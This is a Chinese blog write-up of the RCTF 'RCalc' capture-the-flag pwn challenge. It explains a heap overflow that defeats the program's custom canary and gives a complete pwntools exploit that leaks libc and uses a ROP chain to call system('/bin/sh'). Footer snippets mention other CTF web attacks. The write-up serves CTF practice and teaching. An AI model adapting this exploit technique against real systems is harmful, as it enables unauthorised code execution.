RCTF-RCalc WP

最新推荐文章于 2022-03-09 20:30:00 发布
最新推荐文章于 2022-03-09 20:30:00 发布
阅读量623 收藏
点赞数
分类专栏: 漏洞挖掘与利用 文章标签: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/97620275
版权

保护

在这里插入图片描述

分析

  • IDA分析代码,部分函数名经过我的分析已被重置
    在这里插入图片描述
  • 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。
    在这里插入图片描述
  • 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比

在这里插入图片描述
在这里插入图片描述

  • 仅现在看来,空是溢出覆盖answer还不行,能不能通过别的地方来把ptr2里边的内容也覆盖?再看看别处

      __int64 CalcSystem()
  {
    __int64 result; // rax
    char buf; // [rsp+0h] [rbp-30h]
    __int64 v2; // [rsp+18h] [rbp-18h]
    __int64 v3; // [rsp+20h] [rbp-10h]
    __int64 v4; // [rsp+28h] [rbp-8h]
  
    v3 = GetRandomNumber();
    while ( 1 )
    {
      while ( 1 )
      {
        Menue();
        v2 = Safe_GetNumber();
        if ( v2 != 1 )
          break;
        v4 = Add();
  LABEL_12:
        printf("The result is %d\n", v4);
        printf("Save the result? ");
        read(0, &buf, 0x10uLL);
        if ( !strncmp("yes", &buf, 3uLL) )
          Save(v4);                               // 存在ptr1中
      }
      switch ( v2 )
      {
        case 2LL:
          v4 = Sub();
          goto LABEL_12;
        case 3LL:
          v4 = Mod();
          goto LABEL_12;
        case 4LL:
          v4 = Multi();
          goto LABEL_12;
      }
      if ( v2 == 5 )
        break;
      puts("Invaild choice!");
    }
    result = GetResult();
    if ( result != v3 )
      Error_Exit();
    return result;
  }

  • 这是程序最主要的流程,其中 Save() 函数为前面的想法提供了证实。

      __int64 __fastcall Save(__int64 a1)
  {
    __int64 v1; // rsi
    __int64 v2; // rdx
    __int64 result; // rax
  
    v1 = ptr1[1].pbuf;
    v2 = ptr1->pbuf++;
    result = a1;
    *(v1 + 8 * v2) = a1;
    return result;
  }

  • 回顾一下,程序一开始申请结构体的顺序:ptr1->buf 是最先分配的,所以他的空间地址会在ptr2->buf 的上边,而Save() 函数每执行一次,ptr1->buf 就会下移一个8字节大小的距离,如此一来,在某个时刻就能够和ptr2->buf 指向的数据重合,也就是能够将其覆盖。

  • 那么Save() 函数具体要执行多少次才能够将ptr2->buf 指向的数据覆盖呢?从初始化calc结构体的函数中可知,不少于32次。那就从32开始往上增,调试一波看看。

  • 我选择加法操作,0+0x2019,然后再存,结果发现在0x23的时候就可以覆盖到ptr2->buf
    在这里插入图片描述

  • 在实际写payload的时候用0代替最好,否则容易出问题。只要过了这个自定义的cannary保护,剩下的就按常规操作构造ROP来getshell就行了。

  • 考虑到输入的时候0x20的字符会截断输入,所以以下地址都是不能够用的:
    在这里插入图片描述

  • 幸运的是我们可以通过这两个地址来计算libc的基址:

      got:0000000000601FF0 __libc_start_main_ptr dq offset __libc_start_main
  plt:0000000000400850 ; int printf(const char *format, ...)
  .plt:0000000000400850 _printf         proc near               ; CODE XREF: Menue+58↓p
  .plt:0000000000400850                                         ; Add+14↓p ...
  .plt:0000000000400850                 jmp     cs:off_602038
  .plt:0000000000400850 _printf         endp

  • 可以用printf() 函数泄露 __libc_start_main 地址

完整EXP

from pwn import*
#context.log_level='debug'

p=process('./RCalc')
elf=ELF('./RCalc')
libc=elf.libc

def Add(v1,v2,s):
    p.sendlineafter('choice:','1')
    p.sendlineafter('integer: ',str(v1))
    p.sendline(str(v2))
    p.recvuntil('result? ')
    if s==1:
        p.sendline('yes')
    else:
        p.sendline('no')


paddings='a'*(0x110-8)+p64(0)+'a'*8
libc_start_got=0x0000000000601FF0
print_plt=elf.plt['printf']
pop_rdi=0x0000000000401123
begin=0x0000000000401036
pay=paddings+p64(pop_rdi)+p64(libc_start_got)+p64(print_plt)+p64(begin)#
p.sendlineafter('pls: ',pay)

for i in range(0x23):
    Add(0,0,1)

gdb.attach(p,'b *0x0000000000400F9F')
pause()

p.sendlineafter('choice:','5')
libc_base=u64(p.recv(6).ljust(8,'\0'))-libc.sym['__libc_start_main']
system=libc.sym['system']+libc_base
bin_sh=libc.search('/bin/sh\0').next()+libc_base
success('libc_base:'+hex(libc_base))
success('system:'+hex(system))
success('bin_sh:'+hex(bin_sh))

pay=paddings+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendlineafter('pls: ',pay)
for i in range(0x23):
    Add(0,0,1)
p.sendlineafter('choice:','5')
p.interactive()
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[RCTF2019]disk
qq_51447967的博客
04-28 498
题目分析 首先原题是有提示的 An otaku used VeraCrypt to encrypt his favorites. Password: rctf Flag format: rctf{a-zA-Z0-9_} 下载得到一个vmdk文件,看起来是虚拟机的磁盘文件。 VMDK:(VMWare Virtual Machine Disk Format)是虚拟机VMware创建的虚拟硬盘格式,文件存在于VMware文件系统中,被称为VMFS(虚拟机文件系统) 然后用txt格式打开后搜索CTF得到如下
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 695
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
RCalc RCTF-2017
qq_41071646的博客
07-31 267
这个题目比较好玩的一点就是自己写了一个canary的保护 其实就是首先开了堆 然后随机值 然后 把随机值保存到堆里面 后来在取出来做对比 用一个canary 然后保存一个 类似栈结构 ++ --- 然后 根据 堆的知识以及调试可以知道 我们保存的结果可以溢出到堆里面 那么 我们直接修改就可以了 然后泄露一下就ok了 from pwn import * context.l...
rctf
zhang14916的博客
05-24 558
baby-crtpto: 阅读源码发现程序首先要求我们输入username和password,然后对cookie“admin:0;username:%s;password:%s"做aes-cbc加密,然后计算sha1(key+cookie),最后将AES-cbc的iv,密文和sha1的值连接在一起返回给我们。要求我们输入相同形式的字符串,并要求cookie中存在"admin"="1"且验证sha...
[XCTF-pwn] 30_xctf-3rd-RCTF-2017_rcalc
weixin_52640415的博客
03-09 222
程序本身有溢出,未开pie,got表可写。但是calc有密码校验。 数据结构: 两个0x20块存计数器和指针 0x110块存输入数据 0x330块存使用的密码每次向后加一个提前放入 漏洞: 指针下边界无限制可溢出写,每次会写入输入的数据,通过输入超过33个数覆盖密码区。 思路: 先溢出写入rop 向前移动输入块,清密码1(返回时候用) 选择退出,这时与当前密码指针重叠,可以绕过检查 退出后执行rop得到libc并重入 同1-4写入system(/bin/sh) 完整ex...
RoarCTF Easy Calc wp
weixin_44377940的博客
10-31 253
点开界面: 随便输入数字,抓包,发现有个php文件: 我们跳转看看: 试着传入num参数为字符,发现: 方法一: 官方wp表示考点为php字符串解析绕过modsecurity(这做题的时候谁知道啊) 这里有一篇文章进行了详细介绍,简而言之就是在传参 ...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
《全面解析多合一WP迁移插件:实现无限导入与导出》 在WordPress的世界中,数据迁移是一项常见的任务,无论是为了备份、站点迁移还是多站点管理。"All In One WP Migration" 插件正是为此而生,它为用户提供了一种...
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
all-in-one-wp-migration.zip
02-24
《全面解析WordPress文件上传插件:All-in-One WP Migration》 在WordPress的众多插件中,All-in-One WP Migration是一款非常实用的工具,专为WordPress网站的备份、迁移和恢复而设计。它允许用户轻松地将整个...
all-in-one-wp-migration-file-extension (1)_wordpressplugin_plugi
09-29
《全面解析WordPress插件All-in-One WP Migration File Extension》 在WordPress的世界里,插件是扩展网站功能的重要工具。今天我们将深入探讨一个名为"All-in-One WP Migration File Extension"的插件,它是一款...
rctf:redpwnCTF平台
03-28
rCTF是redpwnCTFCTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)您可以使用部署挑战。 它与rCTF高度集成。 发展 我们将竭诚为您服务! 请参阅 。
[RoarCTF] web easy_calc wp
Vicl1fe的博客
10-21 582
参考链接:[传送门](https://mp.weixin.qq.com/s/iyzOKWbLqDX5Y6Fad5Exmw) CTF讨论群:946220807 wp 一种熟悉的感觉。 相信很多人都遇到个问题。只要num传入字母。就会403。然后一脸懵逼的做下一道题,/xyx。这是因为有waf,匹配num的值是否为数字。首先得先绕过这个waf。 bypass:https://www.freebuf....
RCTF-2021-HarmonyOS赛题WP
kelxLZ的博客
09-13 657
Author:ZERO-A-ONE Date:2021-08-08 0x1 出题意图 本体定位为基础的逆向题目,主要是为了熟悉Open HarmonyOS操作系统环境,熟悉基于OpenHarmony Hi3861V100开发板的RISC-V环境,熟悉IoT环境下常用的Musl-Libc环境 0x2 出题过程 2.1 编译系统固件 riscv32_virt/ 子目录包含部分Qemu RISC-V虚拟化平台验证的OpenHarmony kernel_liteos_m的代码,目录名为riscv32_virt。.
RCTF-2021-Valgrind赛题WP
kelxLZ的博客
09-13 857
出题人:ZERO-A-ONE Date:2021-07-27 0x1 出题意图 ​ 本赛题主要是向选手介绍一种不同于常用的LLVM IR的中间语言。VEX-IR是一套中间语言。使用它的是 Valgrind 插桩框架工具,它的设计思想类似LLVM与QEMU,为了模拟执行已经编译好的某种架构的程序,把目标代码转化为IR中间语言,再把 IR 翻译为本机架构可执行的机器语言,实现跨架构模拟执行,多用于没有源码的二进制程序分析。分析二进制程序,例如做类似插桩的工作时,失去了高级语言的抽象表达,不得不与更底层的部分.
[RCTF2019]calcalcalc 命令执行的时间盲注~~
a3320315的博客
02-10 2109
0x01 题目源码 python from flask import Flask, request import bson import json import datetime app = Flask(__name__) @app.route("/", methods=["POST"]) def calculate(): data = request.get_data() ...
RCTF-misc-coocat wp
qq_53755216的博客
09-15 541
coolcat writeup I am honored to give a misc challenge for RCTF( forgive me for my poor english plz The challenge comes from an article
RCTF-2015 nobug
doudoudedi
06-07 692
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
RCTF-2015——welpwn
05-11 326
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
RCTF2020 复现
weixin_44377940的博客
06-06 1140
题目webcalcMiscSwitch PRO Controller web calc 抓包后发现数据发送至calc.php,访问该页面后,代码审计: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\['
--wp--preset--color--black:这是什么
最新发布
07-12
`--wp--preset--color--black` 是一个以双短横线开头的 CSS 自定义属性(CSS Custom Property)。 这个属性看起来是一个特定于某个平台或框架的命名约定,其中 `wp` 可能代表 WordPress,`preset` 可能代表预设,`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值